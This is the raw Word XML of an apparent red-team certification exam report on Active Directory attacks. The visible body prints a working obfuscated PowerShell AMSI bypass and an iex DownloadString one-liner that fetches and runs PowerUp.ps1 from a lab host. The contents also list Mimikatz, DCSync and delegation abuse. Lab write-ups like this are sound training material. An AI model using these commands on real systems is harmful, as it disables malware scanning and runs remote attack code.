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2246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53E4749" w14:textId="58FC4D77" w:rsidR="00E408CB" w:rsidRPr="00E408CB" w:rsidRDefault="00E408CB" w:rsidP="00E408CB">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:b/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00E408CB">
            <w:rPr>
              <w:b/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="122630C5" w14:textId="1E3B5546" w:rsidR="00E408CB" w:rsidRDefault="00E40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6477312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Getting to Local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C1B1" w14:textId="7521B3A7" w:rsidR="00E408CB" w:rsidRDefault="00E40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13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AMSI Byp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9220" w14:textId="7EB92135" w:rsidR="00E408CB" w:rsidRDefault="00E40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14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Power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7B8B" w14:textId="5ABBDEDE" w:rsidR="00E408CB" w:rsidRDefault="00E40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15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MGMT-S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3387" w14:textId="64DE6B0A" w:rsidR="00E408CB" w:rsidRDefault="00E40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16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Running Bloodh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9D14" w14:textId="4EAD7A4C" w:rsidR="00E408CB" w:rsidRDefault="00E408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17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Constrained</w:t>
            </w:r>
            <w:r w:rsidRPr="00A4363F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:spacing w:val="-16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A4363F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Deleg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FCB4" w14:textId="6EAAD922" w:rsidR="00E408CB" w:rsidRDefault="00E40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18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Abusing Constrained Deleg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69B8" w14:textId="09CCDE4F" w:rsidR="00E408CB" w:rsidRDefault="00E408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19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  <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Remedi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9A00" w14:textId="2976B453" w:rsidR="00E408CB" w:rsidRDefault="00E40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20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Techsrv3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C9E5" w14:textId="307824A5" w:rsidR="00E408CB" w:rsidRDefault="00E40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21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Mimikat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0C24" w14:textId="28CD925B" w:rsidR="00E408CB" w:rsidRDefault="00E40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22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DBSERVER3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9286" w14:textId="1BA1F72C" w:rsidR="00E408CB" w:rsidRDefault="00E40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23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Mimikat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0986" w14:textId="5FCB0BE1" w:rsidR="00E408CB" w:rsidRDefault="00E40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24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Enumerating SQL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5AA1" w14:textId="3843823F" w:rsidR="00E408CB" w:rsidRDefault="00E40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25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Tech-D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C38E" w14:textId="4366A32C" w:rsidR="00E408CB" w:rsidRDefault="00E40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26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DCSyn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FC2C" w14:textId="247C267B" w:rsidR="00E408CB" w:rsidRDefault="00E40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27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FINANCE-D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F8CD" w14:textId="3CE79BB4" w:rsidR="00E408CB" w:rsidRDefault="00E40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28" w:history="1">
            <w:r w:rsidRPr="00A4363F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Child</w:t>
            </w:r>
            <w:r w:rsidRPr="00A4363F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:noProof/>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A4363F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Domain</w:t>
            </w:r>
            <w:r w:rsidRPr="00A4363F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:noProof/>
                <w:spacing w:val="-4"/>
              </w:rPr>
              <w:t xml:space="preserve"> SID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C1FD" w14:textId="55F3456F" w:rsidR="00E408CB" w:rsidRDefault="00E40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477329" w:history="1">
            <w:r w:rsidRPr="00A4363F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Inter-Realm T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BA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8AB8" w14:textId="2B77F37D" w:rsidR="00E408CB" w:rsidRDefault="00E408CB">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7DA8E1A7" w14:textId="37169E59" w:rsidR="00F51A31" w:rsidRDefault="00F51A31"/>
    <w:p w14:paraId="3C6513B9" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="0074358B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2CAD505" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="0074358B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DA563D7" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="0074358B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E2102F2" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="0074358B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D011E45" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="0074358B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4517416" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="0074358B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2F1DAD9" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="Title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9E1EE5C" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="0074358B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FA4654C" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="0074358B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05AC75E" w14:textId="6B82452B" w:rsidR="0074358B" w:rsidRPr="0074358B" w:rsidRDefault="0074358B" w:rsidP="0074358B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4358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RTP Exam Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EFFCC" w14:textId="77777777" w:rsidR="0074358B" w:rsidRDefault="0074358B" w:rsidP="0074358B"/>
    <w:p w14:paraId="2FC7F3C1" w14:textId="77777777" w:rsidR="0074358B" w:rsidRDefault="0074358B" w:rsidP="0074358B"/>
    <w:p w14:paraId="24DEEF48" w14:textId="77777777" w:rsidR="0074358B" w:rsidRDefault="0074358B" w:rsidP="0074358B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc146476878"/>
      <w:bookmarkStart w:id="1" w:name="_Toc146477312"/>
      <w:r w:rsidRPr="0074358B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Getting to Local Admin:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="0074358B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="178E7187" w14:textId="77777777" w:rsidR="0074358B" w:rsidRPr="0074358B" w:rsidRDefault="0074358B" w:rsidP="0074358B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6476879"/>
      <w:bookmarkStart w:id="3" w:name="_Toc146477313"/>
      <w:r w:rsidRPr="0074358B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AMSI Bypas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"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4EA60FC0" w14:textId="77777777" w:rsidR="0074358B" w:rsidRDefault="0074358B" w:rsidP="0074358B"/>
    <w:p w14:paraId="53B70C12" w14:textId="77777777" w:rsidR="00C656B1" w:rsidRDefault="0074358B" w:rsidP="00C656B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first import my attack tools and scripts, </w:t>
      </w:r>
      <w:r w:rsidR="00997304">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>I need to bypass Antimalware Scan Interface</w:t>
      </w:r>
      <w:r w:rsidR="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00997304">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">(AMSI). AMSI works with signature-based detection, which for every malicious keyword URL, function or procedure, AMSI has an associated signature in its database. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00997304">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00997304">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the attacker uses the same keyword again in their code, AMSI will immediately block execution. When I try to import a script without bypassing AMSI, I get an error saying it was </w:t>
      </w:r>
      <w:r w:rsidR="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>detected as malicious. That’s why I used the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3056E7C8" w14:textId="77777777" w:rsidR="00C656B1" w:rsidRDefault="00C656B1" w:rsidP="00C656B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MSI Bypass:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1106A3F3" w14:textId="77777777" w:rsidR="00C656B1" w:rsidRPr="00C656B1" w:rsidRDefault="00C656B1" w:rsidP="00C656B1">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1305"/>
          <w:tab w:val="left" w:pos="2379"/>
          <w:tab w:val="left" w:pos="3981"/>
          <w:tab w:val="left" w:pos="5187"/>
          <w:tab w:val="left" w:pos="6261"/>
          <w:tab w:val="left" w:pos="7862"/>
          <w:tab w:val="left" w:pos="9195"/>
          <w:tab w:val="left" w:pos="9317"/>
        </w:tabs>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:right="138"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘si’;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$b</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘Am’;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$Ref</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[Ref].Assembly.GetType((‘System.Management.Automation.{0}{1}Utils’</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CC4EE9" w14:textId="77777777" w:rsidR="00C656B1" w:rsidRPr="00C656B1" w:rsidRDefault="00C656B1" w:rsidP="00C656B1">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1182"/>
          <w:tab w:val="left" w:pos="2529"/>
          <w:tab w:val="left" w:pos="3480"/>
          <w:tab w:val="left" w:pos="4299"/>
          <w:tab w:val="left" w:pos="9193"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$b,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$a));</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$z</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$Ref.GetField((‘am{0}InitFailed’</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC0BE0" w14:textId="77777777" w:rsidR="00C656B1" w:rsidRDefault="00C656B1" w:rsidP="00C656B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>),‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NonPublic,Static’); </w:t>
      </w:r>
      <w:r w:rsidRPr="00C656B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$z.SetValue($null,$true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6051F0" w14:textId="77777777" w:rsidR="00C656B1" w:rsidRDefault="00C656B1" w:rsidP="00C656B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40343B8E" w14:textId="77777777" w:rsidR="00C656B1" w:rsidRDefault="00C656B1" w:rsidP="00C656B1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6476880"/>
      <w:bookmarkStart w:id="5" w:name="_Toc146477314"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Power Up:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2EDD887C" w14:textId="77777777" w:rsidR="00C656B1" w:rsidRDefault="00C656B1" w:rsidP="00C656B1"/>
    <w:p w14:paraId="03C9C4FB" w14:textId="77777777" w:rsidR="00336227" w:rsidRDefault="00C656B1" w:rsidP="00C656B1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Now I download the </w:t>
      </w:r>
      <w:r w:rsidR="00336227">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>PowerUp  script in memory in order to find privilege escalation paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E96930B" w14:textId="77777777" w:rsidR="00336227" w:rsidRPr="00336227" w:rsidRDefault="00336227" w:rsidP="00336227">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="8007"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336227">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iex</w:t>
      </w:r>
      <w:r w:rsidRPr="00336227">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(New-</w:t>
      </w:r>
      <w:r w:rsidRPr="00336227">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2194003D" w14:textId="77777777" w:rsidR="00336227" w:rsidRDefault="00336227" w:rsidP="00336227">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336227">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00336227">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).DownloadString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00336227">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>('http://172.16.99.11:8000/PowerUp.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9E5B9" w14:textId="77777777" w:rsidR="00336227" w:rsidRDefault="00336227" w:rsidP="00336227"/>
    <w:p w14:paraId="534EC193" w14:textId="77777777" w:rsidR="00336227" w:rsidRDefault="00336227" w:rsidP="00336227"/>
    <w:p w14:paraId="0F64F64D" w14:textId="77777777" w:rsidR="00336227" w:rsidRDefault="00336227" w:rsidP="00336227"/>
    <w:p w14:paraId="2F49AFE8" w14:textId="77777777" w:rsidR="00336227" w:rsidRDefault="00336227" w:rsidP="00336227"/>
